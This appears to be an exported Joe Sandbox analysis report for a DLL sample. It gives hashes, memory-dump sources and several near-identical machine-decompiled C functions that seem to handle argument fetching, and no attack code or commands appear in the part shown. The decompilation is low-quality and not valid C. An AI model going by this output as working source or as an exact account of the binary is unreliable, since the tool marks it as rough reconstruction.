                                                                      • Instruction ID: db6738b52053ca5ebc3b60a0932f0012adb4724fe4fed6a8e5c2e43e40956692
                                                                      • Opcode Fuzzy Hash: 4cb1b57cabdf7c96151d309148b507424f2973327cb8fd69934bbf46bd6256c9
                                                                      • Instruction Fuzzy Hash: A9315E72215A8886DB65CF69E0413AD77A0F39CB88F648129EB8C4B751DF36C556CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180017E80(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017eab;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80017f7a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80017eec;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80017f7c;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80017f6c;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80017f28;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80017f7c;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80017f20;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80017f23;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180017e80
                                                                      0x180017e91
                                                                      0x180017e94
                                                                      0x180017e96
                                                                      0x180017e9b
                                                                      0x180017ea3
                                                                      0x180017ea6
                                                                      0x180017eb5
                                                                      0x180017eb7
                                                                      0x180017ebd
                                                                      0x180017ec0
                                                                      0x180017ec5
                                                                      0x180017ec9
                                                                      0x180017ed0
                                                                      0x180017ed6
                                                                      0x180017edb
                                                                      0x180017ee0
                                                                      0x180017ee7
                                                                      0x180017ef7
                                                                      0x180017ef9
                                                                      0x180017f03
                                                                      0x180017f08
                                                                      0x180017f10
                                                                      0x180017f12
                                                                      0x180017f18
                                                                      0x180017f1d
                                                                      0x180017f20
                                                                      0x180017f26
                                                                      0x180017f28
                                                                      0x180017f2c
                                                                      0x180017f32
                                                                      0x180017f3c
                                                                      0x180017f3e
                                                                      0x180017f42
                                                                      0x180017f45
                                                                      0x180017f4c
                                                                      0x180017f50
                                                                      0x180017f57
                                                                      0x180017f5b
                                                                      0x180017f60
                                                                      0x180017f65
                                                                      0x180017f6a
                                                                      0x180017f77
                                                                      0x180017f86

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1f176b0a5061591b93ef7634f2c166d96f0c785674510990e118967258b1f21a
                                                                      • Instruction ID: 068fdff09e63d9be32dd6e7c3ec08f58dd3122367addb51f34bb30430f0a7ce0
                                                                      • Opcode Fuzzy Hash: 1f176b0a5061591b93ef7634f2c166d96f0c785674510990e118967258b1f21a
                                                                      • Instruction Fuzzy Hash: 27315E72204A4486EB658F29E4413AD77B4E38CB88F258129EB4C4B752DF36C596C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180019F40(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019f6b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8001a03a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019fac;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001a03c;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001a02c;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80019fe8;
                                                                      				 *_t71 = 2;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001a03c;
                                                                      				_v24 = _t43;
                                                                      				r8d = 2;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80019fe0;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019fe3;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180019f40
                                                                      0x180019f51
                                                                      0x180019f54
                                                                      0x180019f56
                                                                      0x180019f5b
                                                                      0x180019f63
                                                                      0x180019f66
                                                                      0x180019f75
                                                                      0x180019f77
                                                                      0x180019f7d
                                                                      0x180019f80
                                                                      0x180019f85
                                                                      0x180019f89
                                                                      0x180019f90
                                                                      0x180019f96
                                                                      0x180019f9b
                                                                      0x180019fa0
                                                                      0x180019fa7
                                                                      0x180019fb7
                                                                      0x180019fb9
                                                                      0x180019fc3
                                                                      0x180019fc8
                                                                      0x180019fd0
                                                                      0x180019fd2
                                                                      0x180019fd8
                                                                      0x180019fdd
                                                                      0x180019fe0
                                                                      0x180019fe6
                                                                      0x180019fe8
                                                                      0x180019fec
                                                                      0x180019ff2
                                                                      0x180019ffc
                                                                      0x180019ffe
                                                                      0x18001a002
                                                                      0x18001a005
                                                                      0x18001a00c
                                                                      0x18001a010
                                                                      0x18001a017
                                                                      0x18001a01b
                                                                      0x18001a020
                                                                      0x18001a025
                                                                      0x18001a02a
                                                                      0x18001a037
                                                                      0x18001a046

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 773afe857da011a50a5447c9e3415a61d8af3fd091879273027c957fb4841997
                                                                      • Instruction ID: 9028ebcc2ca74d376bee17e4c8389275fa2c1527304b9ad44839f45aa24b783b
                                                                      • Opcode Fuzzy Hash: 773afe857da011a50a5447c9e3415a61d8af3fd091879273027c957fb4841997
                                                                      • Instruction Fuzzy Hash: B2318272215B48C6EBA18F29E0417AD77A0F78DB8CF658129EB8C4B751CF36C596C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180017F88(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017fb3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80018082;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80017ff4;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80018084;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80018074;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80018030;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80018084;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80018028;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001802b;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180017f88
                                                                      0x180017f99
                                                                      0x180017f9c
                                                                      0x180017f9e
                                                                      0x180017fa3
                                                                      0x180017fab
                                                                      0x180017fae
                                                                      0x180017fbd
                                                                      0x180017fbf
                                                                      0x180017fc5
                                                                      0x180017fc8
                                                                      0x180017fcd
                                                                      0x180017fd1
                                                                      0x180017fd8
                                                                      0x180017fde
                                                                      0x180017fe3
                                                                      0x180017fe8
                                                                      0x180017fef
                                                                      0x180017fff
                                                                      0x180018001
                                                                      0x18001800b
                                                                      0x180018010
                                                                      0x180018018
                                                                      0x18001801a
                                                                      0x180018020
                                                                      0x180018025
                                                                      0x180018028
                                                                      0x18001802e
                                                                      0x180018030
                                                                      0x180018034
                                                                      0x18001803a
                                                                      0x180018044
                                                                      0x180018046
                                                                      0x18001804a
                                                                      0x18001804d
                                                                      0x180018054
                                                                      0x180018058
                                                                      0x18001805f
                                                                      0x180018063
                                                                      0x180018068
                                                                      0x18001806d
                                                                      0x180018072
                                                                      0x18001807f
                                                                      0x18001808e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d54ac5df06f7197c2a125a6df97a66034b6484f378f437204071a257ca1689b8
                                                                      • Instruction ID: 1d18c59f0b501357fe7a54b910de0837f7cb047f353ab1e7363895b82c0a142d
                                                                      • Opcode Fuzzy Hash: d54ac5df06f7197c2a125a6df97a66034b6484f378f437204071a257ca1689b8
                                                                      • Instruction Fuzzy Hash: F1317572214B88C5DBA18F19D0803AD77A0F78DB8CF658129EB8C4B751CF36C29AD704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 43%
                                                                      			E00000001180019338(void* __eax, long long __rbx, long long __rcx, void* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t41;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				long long _t63;
                                                                      				intOrPtr _t66;
                                                                      				intOrPtr* _t70;
                                                                      				long long _t71;
                                                                      				void* _t72;
                                                                      				void* _t73;
                                                                      				void* _t77;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t63 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019361;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t66 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				asm("movsd xmm0, [ecx-0x8]");
                                                                      				goto 0x8001942c;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800193a2;
                                                                      				_t56 =  *((intOrPtr*)(_t66 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t66 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t71;
                                                                      				E00000001180013858(_t57, __rcx, _t66, __rdx, _t72, _t73, _t77);
                                                                      				goto 0x80019432;
                                                                      				if ( *((intOrPtr*)(_t66 + 0x470)) != 1) goto 0x80019420;
                                                                      				_t43 =  *((intOrPtr*)(_t66 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t63 + 0x39));
                                                                      				_t70 = _t63 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t70 != 0) goto 0x800193dc;
                                                                      				 *_t70 = 4;
                                                                      				 *((intOrPtr*)(_t70 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t70 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80019432;
                                                                      				_v24 = _t43;
                                                                      				r8d = 4;
                                                                      				if (E000000011800245A8(_t41, _t63, _t63, _t70, _t71, _t78, _t79) != 0) goto 0x800193d4;
                                                                      				_t60 =  *((intOrPtr*)(_t63 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t63 + 8));
                                                                      				_v24 = _t71;
                                                                      				E00000001180013858( *((intOrPtr*)(_t63 + 8)), _t63, _t63, _t70, _t72, _t73, _t77);
                                                                      				goto 0x800193d7;
                                                                      				asm("movsd xmm0, [ecx]");
                                                                      				asm("movsd [edx], xmm0");
                                                                      				return 1;
                                                                      			}




















                                                                      0x180019338
                                                                      0x180019349
                                                                      0x18001934c
                                                                      0x18001934e
                                                                      0x180019353
                                                                      0x180019357
                                                                      0x18001935c
                                                                      0x18001936b
                                                                      0x18001936d
                                                                      0x180019373
                                                                      0x180019376
                                                                      0x18001937b
                                                                      0x18001937f
                                                                      0x180019386
                                                                      0x18001938c
                                                                      0x180019391
                                                                      0x180019396
                                                                      0x18001939d
                                                                      0x1800193ad
                                                                      0x1800193af
                                                                      0x1800193b9
                                                                      0x1800193bd
                                                                      0x1800193c5
                                                                      0x1800193c7
                                                                      0x1800193cd
                                                                      0x1800193d1
                                                                      0x1800193d4
                                                                      0x1800193da
                                                                      0x1800193dc
                                                                      0x1800193e0
                                                                      0x1800193f0
                                                                      0x1800193f2
                                                                      0x1800193f6
                                                                      0x1800193f9
                                                                      0x180019400
                                                                      0x180019404
                                                                      0x18001940f
                                                                      0x180019414
                                                                      0x180019419
                                                                      0x18001941e
                                                                      0x180019428
                                                                      0x18001942e
                                                                      0x18001943c

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 36b5ad57a243378542d0631789a0718d0fc942e828a8ede123facde318b9cad6
                                                                      • Instruction ID: 68479c7df2f3eb2310156e59acac7ebcaf2fdd84bda9610e094c7e8e245dc131
                                                                      • Opcode Fuzzy Hash: 36b5ad57a243378542d0631789a0718d0fc942e828a8ede123facde318b9cad6
                                                                      • Instruction Fuzzy Hash: 1B319172215A98C6DB62CF69E05079D7BA0F39DB8CF648115EB8D0B751CF36C286CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 43%
                                                                      			E00000001180019440(void* __eax, long long __rbx, long long __rcx, void* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t41;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				long long _t63;
                                                                      				intOrPtr _t66;
                                                                      				intOrPtr* _t70;
                                                                      				long long _t71;
                                                                      				void* _t72;
                                                                      				void* _t73;
                                                                      				void* _t77;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t63 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019469;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t66 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				asm("movsd xmm0, [ecx-0x8]");
                                                                      				goto 0x80019534;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800194aa;
                                                                      				_t56 =  *((intOrPtr*)(_t66 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t66 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t71;
                                                                      				E00000001180013858(_t57, __rcx, _t66, __rdx, _t72, _t73, _t77);
                                                                      				goto 0x8001953a;
                                                                      				if ( *((intOrPtr*)(_t66 + 0x470)) != 1) goto 0x80019528;
                                                                      				_t43 =  *((intOrPtr*)(_t66 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t63 + 0x39));
                                                                      				_t70 = _t63 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t70 != 0) goto 0x800194e4;
                                                                      				 *_t70 = 4;
                                                                      				 *((intOrPtr*)(_t70 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t70 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001953a;
                                                                      				_v24 = _t43;
                                                                      				r8d = 4;
                                                                      				if (E000000011800247DC(_t41, _t63, _t63, _t70, _t71, _t78, _t79) != 0) goto 0x800194dc;
                                                                      				_t60 =  *((intOrPtr*)(_t63 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t63 + 8));
                                                                      				_v24 = _t71;
                                                                      				E00000001180013858( *((intOrPtr*)(_t63 + 8)), _t63, _t63, _t70, _t72, _t73, _t77);
                                                                      				goto 0x800194df;
                                                                      				asm("movsd xmm0, [ecx]");
                                                                      				asm("movsd [edx], xmm0");
                                                                      				return 1;
                                                                      			}




















                                                                      0x180019440
                                                                      0x180019451
                                                                      0x180019454
                                                                      0x180019456
                                                                      0x18001945b
                                                                      0x18001945f
                                                                      0x180019464
                                                                      0x180019473
                                                                      0x180019475
                                                                      0x18001947b
                                                                      0x18001947e
                                                                      0x180019483
                                                                      0x180019487
                                                                      0x18001948e
                                                                      0x180019494
                                                                      0x180019499
                                                                      0x18001949e
                                                                      0x1800194a5
                                                                      0x1800194b5
                                                                      0x1800194b7
                                                                      0x1800194c1
                                                                      0x1800194c5
                                                                      0x1800194cd
                                                                      0x1800194cf
                                                                      0x1800194d5
                                                                      0x1800194d9
                                                                      0x1800194dc
                                                                      0x1800194e2
                                                                      0x1800194e4
                                                                      0x1800194e8
                                                                      0x1800194f8
                                                                      0x1800194fa
                                                                      0x1800194fe
                                                                      0x180019501
                                                                      0x180019508
                                                                      0x18001950c
                                                                      0x180019517
                                                                      0x18001951c
                                                                      0x180019521
                                                                      0x180019526
                                                                      0x180019530
                                                                      0x180019536
                                                                      0x180019544

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b232946bf37aa12d477fd21a4f0e0eff2adbe799df1a72fb1625ed37053ccc0
                                                                      • Instruction ID: 939e66cbc34195f5e5fe9f343826ac37c52055b0db4667a2f081ea4775853aed
                                                                      • Opcode Fuzzy Hash: 2b232946bf37aa12d477fd21a4f0e0eff2adbe799df1a72fb1625ed37053ccc0
                                                                      • Instruction Fuzzy Hash: A2319172615A88C6DB62CF69E0407AD7BA0F39DB8CF248115EB4D4B751CF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E00000001180019548(void* __eax, long long __rbx, long long __rcx, void* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t42;
                                                                      				intOrPtr _t55;
                                                                      				signed long long _t56;
                                                                      				intOrPtr _t59;
                                                                      				void* _t62;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr* _t69;
                                                                      				long long _t70;
                                                                      				void* _t71;
                                                                      				void* _t72;
                                                                      				void* _t76;
                                                                      				void* _t77;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t62 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019571;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t65 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				asm("movsd xmm0, [ecx-0x8]");
                                                                      				goto 0x8001963e;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800195b2;
                                                                      				_t55 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t55 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t55 + 0x2c)) = 0x16;
                                                                      				_t56 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t56;
                                                                      				_v24 = _t70;
                                                                      				E00000001180013858(_t56, __rcx, _t65, __rdx, _t71, _t72, _t76);
                                                                      				goto 0x80019644;
